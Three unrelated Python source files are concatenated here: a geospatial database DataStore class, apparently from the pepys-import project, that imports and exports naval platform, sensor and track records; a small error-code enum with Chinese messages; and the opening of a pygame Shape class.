from shapely import wkb
from pepys_import.core.formats.location import Location
DEFAULT_DATA_PATH = os.path.join(PEPYS_IMPORT_DIRECTORY, "database", "default_data")
USER = getuser() # Login name of the current user
class DataStore(object):
""" Representation of database
:returns: :class:`DataStore`
"""
# Valid options for db_type are 'postgres' and 'sqlite'
def __init__(
self,
db_username,
db_password,
db_host,
db_port,
db_name,
db_type="postgres",
missing_data_resolver=DefaultResolver(),
welcome_text="Pepys_import",
show_status=True,
):
if db_type == "postgres":
self.db_classes = import_module("pepys_import.core.store.postgres_db")
driver = "postgresql+psycopg2"
elif db_type == "sqlite":
self.db_classes = import_module("pepys_import.core.store.sqlite_db")
driver = "sqlite+pysqlite"
else:
raise Exception(
f"Unknown db_type {db_type} supplied, if specified should be "
"one of 'postgres' or 'sqlite'"
)
# setup meta_class data
self.meta_classes = {}
self.setup_table_type_mapping()
connection_string = "{}://{}:{}@{}:{}/{}".format(
driver, db_username, db_password, db_host, db_port, db_name
)
self.engine = create_engine(connection_string, echo=False)
if db_type == "postgres":
BasePostGIS.metadata.bind = self.engine
elif db_type == "sqlite":
listen(self.engine, "connect", load_spatialite)
BaseSpatiaLite.metadata.bind = self.engine
self.missing_data_resolver = missing_data_resolver
self.welcome_text = welcome_text
self.show_status = show_status
# caches of known data
self.privacies = {}
self.nationalities = {}
self.datafile_types = {}
self.datafiles = {}
self.platform_types = {}
self.platforms = {}
self.sensor_types = {}
self.sensors = {}
self.comment_types = {}
# TEMP list of values for defaulted IDs, to be replaced by missing info lookup mechanism
self.default_user_id = 1 # DevUser
# Instance attributes which are necessary for initialise method
self.db_name = db_name
self.db_type = db_type
# use session_scope() to create a new session
self.session = None
# dictionaries, to cache platform name
self._platform_dict_on_sensor_id = dict()
self._platform_dict_on_platform_id = dict()
# dictionaries, to cache sensor name
self._sensor_dict_on_sensor_id = dict()
# dictionary, to cache comment type name
self._comment_type_name_dict_on_comment_type_id = dict()
# Branding Text
if self.welcome_text:
show_welcome_banner(welcome_text)
if self.show_status:
show_software_meta_info(__version__, self.db_type, self.db_name, db_host)
# The 'pepys-import' banner is 61 characters wide, so making a line
# of the same length makes things prettier
print("-" * 61)
def initialise(self):
"""Create schemas for the database
"""
if self.db_type == "sqlite":
try:
# Create geometry_columns and spatial_ref_sys metadata table
if not self.engine.dialect.has_table(self.engine, "spatial_ref_sys"):
with self.engine.connect() as conn:
conn.execute(select([func.InitSpatialMetaData(1)]))
# Attempt to create schema if not present, to cope with fresh DB file
BaseSpatiaLite.metadata.create_all(self.engine)
except OperationalError:
raise Exception(
"Error creating database schema, possible invalid path?"
f" ('{self.db_name}'). Quitting"
)
elif self.db_type == "postgres":
try:
# Create schema pepys and extension for PostGIS first
query = """
CREATE SCHEMA IF NOT EXISTS pepys;
CREATE EXTENSION IF NOT EXISTS postgis;
SET search_path = pepys,public;
"""
with self.engine.connect() as conn:
conn.execute(query)
BasePostGIS.metadata.create_all(self.engine)
except OperationalError:
raise Exception(f"Error creating database({self.db_name})! Quitting")
@contextmanager
def session_scope(self):
"""Provide a transactional scope around a series of operations."""
db_session = sessionmaker(bind=self.engine)
self.session = db_session()
try:
yield self
self.session.commit()
except:
self.session.rollback()
raise
finally:
self.session.close()
#############################################################
# Other DataStore Methods
def setup_table_type_mapping(self):
"""Setup a map of tables keyed by :class:`TableType`"""
db_classes = dict(
[
(name, cls)
for name, cls in self.db_classes.__dict__.items()
if isinstance(cls, type)
and (issubclass(cls, BasePostGIS) or issubclass(cls, BaseSpatiaLite))
and cls.__name__ != "Base"
]
)
for table_type in TableTypes:
self.meta_classes[table_type] = [
cls
for name, cls in db_classes.items()
if db_classes[name].table_type == table_type
]
def populate_reference(self, reference_data_folder=None):
"""Import given CSV file to the given reference table"""
change = self.add_to_changes(
user=USER, modified=datetime.utcnow(), reason="Importing reference data"
)
if reference_data_folder is None:
reference_data_folder = os.path.join(DEFAULT_DATA_PATH)
files = os.listdir(reference_data_folder)
reference_tables = []
# Create reference table list
self.setup_table_type_mapping()
reference_table_objects = self.meta_classes[TableTypes.REFERENCE]
for table_object in list(reference_table_objects):
reference_tables.append(table_object.__tablename__)
reference_files = [
file
for file in files
if os.path.splitext(file)[0].replace(" ", "") in reference_tables
]
import_from_csv(self, reference_data_folder, reference_files, change.change_id)
def populate_metadata(self, sample_data_folder=None):
"""Import CSV files from the given folder to the related Metadata Tables"""
change = self.add_to_changes(
user=USER, modified=datetime.utcnow(), reason="Importing metadata data"
)
if sample_data_folder is None:
sample_data_folder = os.path.join(DEFAULT_DATA_PATH)
files = os.listdir(sample_data_folder)
metadata_tables = []
# Create metadata table list
self.setup_table_type_mapping()
metadata_table_objects = self.meta_classes[TableTypes.METADATA]
for table_object in list(metadata_table_objects):
metadata_tables.append(table_object.__tablename__)
metadata_files = [
file for file in files if os.path.splitext(file)[0] in metadata_tables
]
import_from_csv(self, sample_data_folder, metadata_files, change.change_id)
def populate_measurement(self, sample_data_folder=None):
"""Import CSV files from the given folder to the related Measurement Tables"""
change = self.add_to_changes(
user=USER, modified=datetime.utcnow(), reason="Importing measurement data"
)
if sample_data_folder is None:
sample_data_folder = DEFAULT_DATA_PATH
files = os.listdir(sample_data_folder)
measurement_tables = []
# Create measurement table list
measurement_table_objects = self.meta_classes[TableTypes.MEASUREMENT]
for table_object in list(measurement_table_objects):
measurement_tables.append(table_object.__tablename__)
measurement_files = [
file for file in files if os.path.splitext(file)[0] in measurement_tables
]
import_from_csv(self, sample_data_folder, measurement_files, change.change_id)
# End of Data Store methods
#############################################################
def add_to_states(
self,
time,
sensor,
datafile,
location=None,
elevation=None,
heading=None,
course=None,
speed=None,
privacy=None,
change_id=None,
):
"""
Adds the specified state to the :class:`State` table if not already present.
:param time: Timestamp of :class:`State`
:type time: datetime
:param sensor: Sensor of :class:`State`
:type sensor: Sensor
:param datafile: Datafile of :class:`State`
:type datafile: Datafile
:param location: Location of :class:`State`
:type location: Point
:param elevation: Elevation of :class:`State` in metres (use negative for depth)
:type elevation: String
:param heading: Heading of :class:`State` (Which converted to radians)
:type heading: String
:param course: Course of :class:`State`
:type course:
:param speed: Speed of :class:`State` (Which converted to m/sec)
:type speed: String
:param privacy: :class:`Privacy` of :class:`State`
:type privacy: Privacy
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Created :class:`State` entity
:rtype: State
"""
if type(time) == str:
# TODO we can't assume the time is in this format. We should throw
# exception if time isn't of type datetime
time = datetime.strptime(time, "%Y-%m-%d %H:%M:%S")
sensor = self.search_sensor(sensor)
datafile = self.search_datafile(datafile)
privacy = self.search_privacy(privacy)
if sensor is None or datafile is None:
raise Exception(f"There is missing value(s) in '{sensor}, {datafile}'!")
if elevation == "":
elevation = None
if heading == "":
heading = None
if course == "":
course = None
if speed == "":
speed = None
elevation = elevation * unit_registry.metre
loc = Location()
loc.set_from_wkt_string(location)
location = loc
state_obj = self.db_classes.State(
time=time,
sensor_id=sensor.sensor_id,
location=location,
elevation=elevation,
heading=heading,
course=course,
speed=speed,
source_id=datafile.datafile_id,
privacy_id=privacy.privacy_id,
)
self.session.add(state_obj)
self.session.flush()
self.session.expire(state_obj, ["_location"])
self.add_to_logs(
table=constants.STATE, row_id=state_obj.state_id, change_id=change_id
)
return state_obj
def add_to_sensors(self, name, sensor_type, host, change_id):
"""
Adds the specified sensor to the :class:`Sensor` table if not already present.
:param name: Name of sensor
:type name: String
:param sensor_type: Type of sensor
:type sensor_type: :class:`SensorType`
:param host: Platform of sensor
:type host: Platform
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Created Sensor entity
"""
sensor_type = self.search_sensor_type(sensor_type)
host = self.search_platform(host)
if sensor_type is None or host is None:
raise Exception(f"There is missing value(s) in '{sensor_type}, {host}'!")
sensor_obj = self.db_classes.Sensor(
name=name, sensor_type_id=sensor_type.sensor_type_id, host=host.platform_id,
)
self.session.add(sensor_obj)
self.session.flush()
self.add_to_logs(
table=constants.SENSOR, row_id=sensor_obj.sensor_id, change_id=change_id
)
return sensor_obj
def add_to_datafiles(
self,
privacy,
file_type,
reference=None,
simulated=False,
url=None,
change_id=None,
):
"""
Adds the specified datafile to the Datafile table if not already present.
:param simulated: :class:`Datafile` is simulated or not
:type simulated: Boolean
:param privacy: :class:`Privacy` of :class:`Datafile`
:type privacy: Privacy
:param file_type: Type of :class:`Datafile`
:type file_type: String
:param reference: Reference of :class:`Datafile`
:type reference: String
:param url: URL of datafile
:type url: String
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Created :class:`Datafile` entity
:rtype: Datafile
"""
datafile_type = self.search_datafile_type(file_type)
privacy = self.search_privacy(privacy)
datafile_obj = self.db_classes.Datafile(
simulated=bool(simulated),
privacy_id=privacy.privacy_id,
datafile_type_id=datafile_type.datafile_type_id,
reference=reference,
url=url,
)
self.session.add(datafile_obj)
self.session.flush()
print(f"'{reference}' added to Datafile!")
# add to cache and return created datafile
self.datafiles[reference] = datafile_obj
self.add_to_logs(
table=constants.DATAFILE,
row_id=datafile_obj.datafile_id,
change_id=change_id,
)
return datafile_obj
def add_to_platforms(
self,
name,
nationality,
platform_type,
privacy,
trigraph=None,
quadgraph=None,
pennant_number=None,
change_id=None,
):
"""
Adds the specified platform to the Platform table if not already present.
:param name: Name of :class:`Platform`
:type name: String
:param nationality: Nationality of :class:`Platform`
:type nationality: Nationality
:param platform_type: Type of :class:`Platform`
:type platform_type: PlatformType
:param privacy: :class:`Privacy` of :class:`Platform`
:type privacy: Privacy
:param trigraph: Trigraph of :class:`Platform`
:type trigraph: String
:param quadgraph: Quadgraph of :class:`Platform`
:type quadgraph: String
:param pennant_number: Pennant number of :class:`Platform`
:type pennant_number: String
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Created Platform entity
:rtype: Platform
"""
nationality = self.search_nationality(nationality)
platform_type = self.search_platform_type(platform_type)
privacy = self.search_privacy(privacy)
platform_obj = self.db_classes.Platform(
name=name,
trigraph=trigraph,
quadgraph=quadgraph,
pennant=pennant_number,
nationality_id=nationality.nationality_id,
platform_type_id=platform_type.platform_type_id,
privacy_id=privacy.privacy_id,
)
self.session.add(platform_obj)
self.session.flush()
print(f"'{name}' added to Platform!")
# add to cache and return created platform
self.platforms[name] = platform_obj
self.add_to_logs(
table=constants.PLATFORM,
row_id=platform_obj.platform_id,
change_id=change_id,
)
return platform_obj
def add_to_synonyms(self, table, name, entity, change_id):
# enough info to proceed and create entry
synonym = self.db_classes.Synonym(table=table, synonym=name, entity=entity)
self.session.add(synonym)
self.session.flush()
self.add_to_logs(
table=constants.SYNONYM, row_id=synonym.synonym_id, change_id=change_id
)
return synonym
#############################################################
# Search/lookup functions
def search_datafile_type(self, name):
"""Search for any datafile type with this name"""
return (
self.session.query(self.db_classes.DatafileType)
.filter(self.db_classes.DatafileType.name == name)
.first()
)
def search_datafile(self, name):
"""Search for any datafile with this name"""
return (
self.session.query(self.db_classes.Datafile)
.filter(self.db_classes.Datafile.reference == name)
.first()
)
def search_platform(self, name):
"""Search for any platform with this name"""
return (
self.session.query(self.db_classes.Platform)
.filter(self.db_classes.Platform.name == name)
.first()
)
def search_platform_type(self, name):
"""Search for any platform type with this name"""
return (
self.session.query(self.db_classes.PlatformType)
.filter(self.db_classes.PlatformType.name == name)
.first()
)
def search_nationality(self, name):
"""Search for any nationality with this name"""
return (
self.session.query(self.db_classes.Nationality)
.filter(self.db_classes.Nationality.name == name)
.first()
)
def search_sensor(self, name):
"""Search for any sensor type featuring this name"""
return (
self.session.query(self.db_classes.Sensor)
.filter(self.db_classes.Sensor.name == name)
.first()
)
def search_sensor_type(self, name):
"""Search for any sensor type featuring this name"""
return (
self.session.query(self.db_classes.SensorType)
.filter(self.db_classes.SensorType.name == name)
.first()
)
def search_privacy(self, name):
"""Search for any privacy with this name"""
return (
self.session.query(self.db_classes.Privacy)
.filter(self.db_classes.Privacy.name == name)
.first()
)
#############################################################
# New methods
def synonym_search(self, name, table, pk_field):
"""
This method looks up the Synonyms Table and returns if there is any matched entity.
:param name: Name to search
:type name: String
:param table: Table object to query found synonym entity
:type table: :class:`BasePostGIS` or :class``BaseSpatiaLite
:param pk_field: Primary Key field of the table
:type pk_field: :class:`sqlalchemy.orm.attributes.InstrumentedAttribute`
:return: Returns found entity or None
"""
synonym = (
self.session.query(self.db_classes.Synonym)
.filter(
self.db_classes.Synonym.synonym == name,
self.db_classes.Synonym.table == table.__tablename__,
)
.first()
)
if synonym:
match = self.session.query(table).filter(pk_field == synonym.entity).first()
if match:
return match
return None
def find_datafile(self, datafile_name):
"""
This method tries to find a Datafile entity with the given datafile_name. If it
finds, it returns the entity. If it is not found, it searches synonyms.
:param datafile_name: Name of Datafile
:type datafile_name: String
:return:
"""
datafile = (
self.session.query(self.db_classes.Datafile)
.filter(self.db_classes.Datafile.reference == datafile_name)
.first()
)
if datafile:
return datafile
# Datafile is not found, try to find a synonym
return self.synonym_search(
name=datafile_name,
table=self.db_classes.Datafile,
pk_field=self.db_classes.Datafile.datafile_id,
)
def get_datafile(self, datafile_name=None, datafile_type=None, change_id=None):
"""
Adds an entry to the datafiles table of the specified name (path)
and type if not already present. It uses find_datafile method to search existing datafiles.
:param datafile_name: Name of Datafile
:type datafile_name: String
:param datafile_type: Type of Datafile
:type datafile_type: DatafileType
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Created Datafile entity
:rtype: Datafile
"""
# Check for name match in Datafile and Synonym Tables
if datafile_name:
datafile = self.find_datafile(datafile_name=datafile_name)
if datafile:
# found object should be initialised because of _measurement variable
datafile.__init__()
return datafile
resolved_data = self.missing_data_resolver.resolve_datafile(
self, datafile_name, datafile_type, None, change_id=change_id
)
# It means that new datafile added as a synonym and existing datafile returned
if isinstance(resolved_data, self.db_classes.Datafile):
return resolved_data
datafile_name, datafile_type, privacy = resolved_data
assert isinstance(
datafile_type, self.db_classes.DatafileType
), "Type error for DatafileType entity"
assert isinstance(
privacy, self.db_classes.Privacy
), "Type error for Privacy entity"
return self.add_to_datafiles(
simulated=False,
privacy=privacy.name,
file_type=datafile_type.name,
reference=datafile_name,
change_id=change_id,
)
def find_platform(self, platform_name):
"""
This method tries to find a Platform entity with the given platform_name. If it
finds, it returns the entity. If it is not found, it searches synonyms.
:param platform_name: Name of :class:`Platform`
:type platform_name: String
:return:
"""
platform = (
self.session.query(self.db_classes.Platform)
.filter(
or_(
self.db_classes.Platform.name == platform_name,
self.db_classes.Platform.trigraph == platform_name,
self.db_classes.Platform.quadgraph == platform_name,
)
)
.first()
)
if platform:
return platform
# Platform is not found, try to find a synonym
return self.synonym_search(
name=platform_name,
table=self.db_classes.Platform,
pk_field=self.db_classes.Platform.platform_id,
)
def get_platform(
self,
platform_name=None,
nationality=None,
platform_type=None,
privacy=None,
trigraph=None,
quadgraph=None,
pennant_number=None,
change_id=None,
):
"""
Adds an entry to the platforms table for the specified platform
if not already present. It uses find_platform method to search existing platforms.
:param platform_name: Name of :class:`Platform`
:type platform_name: String
:param nationality: Name of :class:`Nationality`
:type nationality: Nationality
:param platform_type: Name of :class:`PlatformType`
:type platform_type: PlatformType
:param privacy: Name of :class:`Privacy`
:type privacy: Privacy
:param trigraph: Trigraph of :class:`Platform`
:type trigraph: String
:param quadgraph: Quadgraph of :class:`Platform`
:type quadgraph: String
:param pennant_number: Pennant number of :class:`Platform`
:type pennant_number: String
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Created Platform entity
"""
# Check for name match in Platform and Synonym Tables
if platform_name:
platform = self.find_platform(platform_name)
if platform:
return platform
nationality = self.search_nationality(nationality)
platform_type = self.search_platform_type(platform_type)
privacy = self.search_privacy(privacy)
if (
platform_name is None
or nationality is None
or platform_type is None
or privacy is None
):
resolved_data = self.missing_data_resolver.resolve_platform(
self, platform_name, platform_type, nationality, privacy, change_id
)
# It means that new platform added as a synonym and existing platform returned
if isinstance(resolved_data, self.db_classes.Platform):
return resolved_data
elif len(resolved_data) == 7:
(
platform_name,
trigraph,
quadgraph,
pennant_number,
platform_type,
nationality,
privacy,
) = resolved_data
assert isinstance(
nationality, self.db_classes.Nationality
), "Type error for Nationality entity"
assert isinstance(
platform_type, self.db_classes.PlatformType
), "Type error for PlatformType entity"
assert isinstance(
privacy, self.db_classes.Privacy
), "Type error for Privacy entity"
return self.add_to_platforms(
name=platform_name,
trigraph=trigraph,
quadgraph=quadgraph,
pennant_number=pennant_number,
nationality=nationality.name,
platform_type=platform_type.name,
privacy=privacy.name,
change_id=change_id,
)
def get_status(
self,
report_measurement: bool = False,
report_metadata: bool = False,
report_reference: bool = False,
):
"""
Provides a summary of the contents of the :class:`DataStore`.
:param report_measurement: Boolean flag includes Metadata Tables
:type report_measurement: Boolean
:param report_metadata: Boolean flag includes Metadata Tables
:type report_metadata: Boolean
:param report_reference: Boolean flag includes Metadata Tables
:type report_reference: Boolean
:return: The summary of the contents of the :class:`DataStore`
:rtype: TableSummarySet
"""
table_summaries = []
if report_measurement:
# Create measurement table list
measurement_table_objects = self.meta_classes[TableTypes.MEASUREMENT]
for table_object in list(measurement_table_objects):
ts = TableSummary(self.session, table_object)
table_summaries.append(ts)
if report_metadata:
# Create metadata table list
metadata_table_objects = self.meta_classes[TableTypes.METADATA]
for table_object in list(metadata_table_objects):
ts = TableSummary(self.session, table_object)
table_summaries.append(ts)
if report_reference:
# Create reference table list
reference_table_objects = self.meta_classes[TableTypes.REFERENCE]
for table_object in list(reference_table_objects):
ts = TableSummary(self.session, table_object)
table_summaries.append(ts)
table_summaries_set = TableSummarySet(table_summaries)
return table_summaries_set
def search_comment_type(self, name):
"""Search for any comment type featuring this name"""
return (
self.session.query(self.db_classes.CommentType)
.filter(self.db_classes.CommentType.name == name)
.first()
)
def add_to_comment_types(self, name, change_id):
"""
Adds the specified comment type to the CommentType table if not already present
:param name: Name of :class:`CommentType`
:type name: String
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Created entity of :class:`CommentType` table
:rtype: CommentType
"""
# check in cache for comment type
if name in self.comment_types:
return self.comment_types[name]
# doesn't exist in cache, try to lookup in DB
comment_types = self.search_comment_type(name)
if comment_types:
# add to cache and return looked up platform type
self.comment_types[name] = comment_types
return comment_types
# enough info to proceed and create entry
comment_type = self.db_classes.CommentType(name=name)
self.session.add(comment_type)
self.session.flush()
# add to cache and return created platform type
self.comment_types[name] = comment_type
self.add_to_logs(
table=constants.COMMENT_TYPE,
row_id=comment_type.comment_type_id,
change_id=change_id,
)
return comment_type
# End of Measurements
#############################################################
# Reference Type Maintenance
def add_to_platform_types(self, platform_type_name, change_id):
"""
Adds the specified platform type to the platform types table if not already
present.
:param platform_type_name: Name of :class:`PlatformType`
:type platform_type_name: String
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Created :class:`PlatformType` entity
:rtype: PlatformType
"""
# check in cache for nationality
if platform_type_name in self.platform_types:
return self.platform_types[platform_type_name]
# doesn't exist in cache, try to lookup in DB
platform_types = self.search_platform_type(platform_type_name)
if platform_types:
# add to cache and return looked up platform type
self.platform_types[platform_type_name] = platform_types
return platform_types
# enough info to proceed and create entry
platform_type = self.db_classes.PlatformType(name=platform_type_name)
self.session.add(platform_type)
self.session.flush()
# add to cache and return created platform type
self.platform_types[platform_type_name] = platform_type
self.add_to_logs(
table=constants.PLATFORM_TYPE,
row_id=platform_type.platform_type_id,
change_id=change_id,
)
return platform_type
def add_to_nationalities(self, nationality_name, change_id):
"""
Adds the specified nationality to the nationalities table if not already present
:param nationality_name: Name of :class:`Nationality`
:type nationality_name: String
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Created :class:`Nationality` entity
:rtype: Nationality
"""
# check in cache for nationality
if nationality_name in self.nationalities:
return self.nationalities[nationality_name]
# doesn't exist in cache, try to lookup in DB
nationalities = self.search_nationality(nationality_name)
if nationalities:
# add to cache and return looked up nationality
self.nationalities[nationality_name] = nationalities
return nationalities
# enough info to proceed and create entry
nationality = self.db_classes.Nationality(name=nationality_name)
self.session.add(nationality)
self.session.flush()
# add to cache and return created platform
self.nationalities[nationality_name] = nationality
self.add_to_logs(
table=constants.NATIONALITY,
row_id=nationality.nationality_id,
change_id=change_id,
)
return nationality
def add_to_privacies(self, privacy_name, change_id):
"""
Adds the specified privacy entry to the :class:`Privacy` table if not already present.
:param privacy_name: Name of :class:`Privacy`
:type privacy_name: String
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Created :class:`Privacy` entity
:rtype: Privacy
"""
# check in cache for privacy
if privacy_name in self.privacies:
return self.privacies[privacy_name]
# doesn't exist in cache, try to lookup in DB
privacies = self.search_privacy(privacy_name)
if privacies:
# add to cache and return looked up platform
self.privacies[privacy_name] = privacies
return privacies
# enough info to proceed and create entry
privacy = self.db_classes.Privacy(name=privacy_name)
self.session.add(privacy)
self.session.flush()
# add to cache and return created platform
self.privacies[privacy_name] = privacy
self.add_to_logs(
table=constants.PRIVACY, row_id=privacy.privacy_id, change_id=change_id
)
return privacy
def add_to_datafile_types(self, datafile_type, change_id):
"""
Adds the specified datafile type to the datafile types table if not already
present.
:param datafile_type: Name of :class:`DatafileType`
:type datafile_type: String
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Wrapped database entity for :class:`DatafileType`
:rtype: DatafileType
"""
# check in cache for datafile type
if datafile_type in self.datafile_types:
return self.datafile_types[datafile_type]
# doesn't exist in cache, try to lookup in DB
datafile_types = self.search_datafile_type(datafile_type)
if datafile_types:
# add to cache and return looked up datafile type
self.datafile_types[datafile_type] = datafile_types
return datafile_types
# proceed and create entry
datafile_type_obj = self.db_classes.DatafileType(name=datafile_type)
self.session.add(datafile_type_obj)
self.session.flush()
# add to cache and return created datafile type
self.datafile_types[datafile_type] = datafile_type_obj
self.add_to_logs(
table=constants.DATAFILE_TYPE,
row_id=datafile_type_obj.datafile_type_id,
change_id=change_id,
)
return datafile_type_obj
def add_to_sensor_types(self, sensor_type_name, change_id):
"""
Adds the specified sensor type to the :class:`SensorType` table if not already present.
:param sensor_type_name: Name of :class:`SensorType`
:type sensor_type_name: String
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Created :class:`SensorType` entity
:rtype: SensorType
"""
# check in cache for sensor type
if sensor_type_name in self.sensor_types:
return self.sensor_types[sensor_type_name]
# doesn't exist in cache, try to lookup in DB
sensor_types = self.search_sensor_type(sensor_type_name)
if sensor_types:
# add to cache and return looked up sensor type
self.sensor_types[sensor_type_name] = sensor_types
return sensor_types
# enough info to proceed and create entry
sensor_type = self.db_classes.SensorType(name=sensor_type_name)
self.session.add(sensor_type)
self.session.flush()
# add to cache and return created sensor type
self.sensor_types[sensor_type_name] = sensor_type
self.add_to_logs(
table=constants.SENSOR_TYPE,
row_id=sensor_type.sensor_type_id,
change_id=change_id,
)
return sensor_type
# End of References
#############################################################
# Metadata Maintenance
def add_to_logs(self, table, row_id, field=None, new_value=None, change_id=None):
"""
Adds the specified event to the :class:`Logs`table if not already present.
:param table: Name of the table
:param row_id: Entity ID of the tale
:param field: Name of the field
:param new_value: New value of the field
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:param change_id: Row ID of entity of :class:`Changes` about the change
:return: Created :class:`Logs` entity
"""
log = self.db_classes.Log(
table=table,
id=row_id,
field=field,
new_value=new_value,
change_id=change_id,
)
self.session.add(log)
self.session.flush()
return log
def add_to_changes(self, user, modified, reason):
"""
Adds the specified event to the :class:`Change`table if not already present.
:param user: Username of the current login
:param modified: Change date
:param reason: Reason of the change
:return: Created :class:`Change` entity
"""
change = self.db_classes.Change(user=user, modified=modified, reason=reason,)
self.session.add(change)
self.session.flush()
return change
# End of Metadata Maintenance
#############################################################
def clear_db(self):
"""Delete records of all database tables"""
if self.db_type == "sqlite":
meta = BaseSpatiaLite.metadata
else:
meta = BasePostGIS.metadata
with self.session_scope():
for table in reversed(meta.sorted_tables):
self.session.execute(table.delete())
def get_all_datafiles(self):
"""
Gets all datafiles.
:return: Datafile entity
:rtype: Datafile
"""
datafiles = self.session.query(self.db_classes.Datafile).all()
return datafiles
def get_cached_comment_type_name(self, comment_type_id):
"""
Get comment type name from cache on either "comment_type_id"
If name is not found in the cache, sytem will load from the data store,
and add it into cache.
"""
if comment_type_id:
# return from cache
if comment_type_id in self._comment_type_name_dict_on_comment_type_id:
return self._comment_type_name_dict_on_comment_type_id[comment_type_id]
comment_type = (
self.session.query(self.db_classes.CommentType)
.filter(self.db_classes.CommentType.comment_type_id == comment_type_id)
.first()
)
if comment_type:
self._comment_type_name_dict_on_comment_type_id[
comment_type_id
] = comment_type.name
return comment_type.name
else:
raise Exception(
"No Comment Type found with Comment type id: {}".format(
comment_type_id
)
)
def get_cached_sensor_name(self, sensor_id):
# return from cache
if sensor_id in self._sensor_dict_on_sensor_id:
return self._sensor_dict_on_sensor_id[sensor_id]
sensor = (
self.session.query(self.db_classes.Sensor)
.filter(self.db_classes.Sensor.sensor_id == sensor_id)
.first()
)
if sensor:
self._sensor_dict_on_sensor_id[sensor_id] = sensor.name
return sensor.name
else:
raise Exception("No sensor found with sensor id: {}".format(sensor_id))
def get_cached_platform_name(self, sensor_id=None, platform_id=None):
"""
Get platform name from cache on either "sensor_id" or "platform_id"
If name is not found in the cache, sytem will load from this data store,
and add it into cache.
"""
# invalid parameter handling
if sensor_id is None and platform_id is None:
raise Exception(
'either "sensor_id" or "platform_id" has to be provided to get "platform name"'
)
if sensor_id:
# return from cache
if sensor_id in self._platform_dict_on_sensor_id:
return self._platform_dict_on_sensor_id[sensor_id]
sensor = (
self.session.query(self.db_classes.Sensor)
.filter(self.db_classes.Sensor.sensor_id == sensor_id)
.first()
)
if sensor:
platform_id = sensor.host
else:
raise Exception("No sensor found with sensor id: {}".format(sensor_id))
if platform_id:
# return from cache
if platform_id in self._platform_dict_on_platform_id:
return self._platform_dict_on_platform_id[platform_id]
platform = (
self.session.query(self.db_classes.Sensor)
.filter(self.db_classes.Sensor.sensor_id == sensor_id)
.first()
)
if platform:
self._platform_dict_on_platform_id[platform_id] = platform.name
if sensor_id:
self._platform_dict_on_sensor_id[sensor_id] = platform.name
else:
raise Exception(
"No Platform found with platform id: {}".format(platform_id)
)
return platform.name
def export_datafile(self, datafile_id, datafile):
"""
Get states, contacts and comments based on Datafile ID.
:param datafile_id: ID of Datafile
:type datafile_id: String
"""
f = open("{}.rep".format(datafile), "w+")
states = (
self.session.query(self.db_classes.State)
.filter(self.db_classes.State.source_id == datafile_id)
.all()
)
contacts = (
self.session.query(self.db_classes.Contact)
.filter(self.db_classes.Contact.source_id == datafile_id)
.all()
)
comments = (
self.session.query(self.db_classes.Comment)
.filter(self.db_classes.Comment.source_id == datafile_id)
.all()
)
line_number = 0
# export states
for i, state in enumerate(states):
line_number += 1
# load platform name from cache.
try:
platform_name = self.get_cached_platform_name(sensor_id=state.sensor_id)
except Exception as ex:
print(str(ex))
platform_name = "[Not Found]"
if state.elevation is None:
depthStr = "NaN"
elif state.elevation == 0.0:
depthStr = "0.0"
else:
depthStr = -1 * state.elevation.magnitude
state_rep_line = [
transformer.format_datatime(state.time),
'"' + platform_name + '"',
"AA",
transformer.format_point(
state.location.longitude, state.location.latitude
),
str(unit_converter.convert_radian_to_degree(state.heading))
if state.heading
else "0",
str(unit_converter.convert_mps_to_knot(state.speed))
if state.speed
else "0",
depthStr,
]
data = " ".join(state_rep_line)
f.write(data + "\r\n")
# Export contacts
for i, contact in enumerate(contacts):
line_number += 1
# load platform name from cache.
platform_name = "[Not Found]"
sensor_name = "[Not Found]"
try:
platform_name = self.get_cached_platform_name(
sensor_id=contact.sensor_id
)
sensor_name = self.get_cached_sensor_name(sensor_id=contact.sensor_id)
except Exception as ex:
print(str(ex))
# wkb hex conversion to "point"
point = None
if contact.location is not None:
point = wkb.loads(contact.location.desc, hex=True)
contact_rep_line = [
transformer.format_datatime(contact.time),
platform_name,
"@@",
transformer.format_point(point.y, point.x) if point else "NULL",
str(math.degrees(contact.bearing)) if contact.bearing else "NULL",
"NULL", # unit_converter.convert_meter_to_yard(contact.range) if contact.range else "NULL",
sensor_name,
"N/A",
]
ambigous_bearing = None # TODO: ambigous bearing.
if ambigous_bearing or contact.freq:
contact_rep_line.insert(0, ";SENSOR2:")
contact_rep_line.insert(
6, str(ambigous_bearing) if ambigous_bearing else "NULL",
)
contact_rep_line.insert(
7, str(contact.freq) if contact.freq else "NULL",
)
else:
contact_rep_line.insert(0, ";SENSOR:")
print(contact_rep_line)
data = " ".join(contact_rep_line)
print(data)
f.write(data + "\r\n")
for i, comment in enumerate(comments):
vessel_name = self.get_cached_platform_name(platform_id=comment.platform_id)
message = comment.content
comment_type_name = self.get_cached_comment_type_name(
comment.comment_type_id
)
comment_rep_line = [
transformer.format_datatime(comment.time),
vessel_name,
comment_type_name,
message,
]
if comment_type_name == "None":
comment_rep_line.insert(0, ";NARRATIVE:")
del comment_rep_line[3]
else:
comment_rep_line.insert(0, ";NARRATIVE2:")
data = " ".join(comment_rep_line)
f.write(data + "\r\n")
f.close()
|
# @Author : Shusheng Wang
# @Time : 2021/2/2 6:17 下午
# @Email : lastshusheng@163.com
from enum import Enum
class ErrorCode(Enum):
ParamsError = -3
Success = 0
class ErrorCodeHelper:
@classmethod
def transform_error_msg(cls, err_code):
msg = ""
if err_code == ErrorCode.ParamsError:
msg = "参数错误"
elif err_code == ErrorCode.Success:
msg = "成功"
return msg
|
import pygame
from ..._gid import Gid
from ..._gevent import GEvent
from ..._color import Color
from ..._move import Move
from ._collision_box import CollisionBox
class Shape(Gid):
"""Shape represents a collection of cells to be displayed in a grid board.
"""
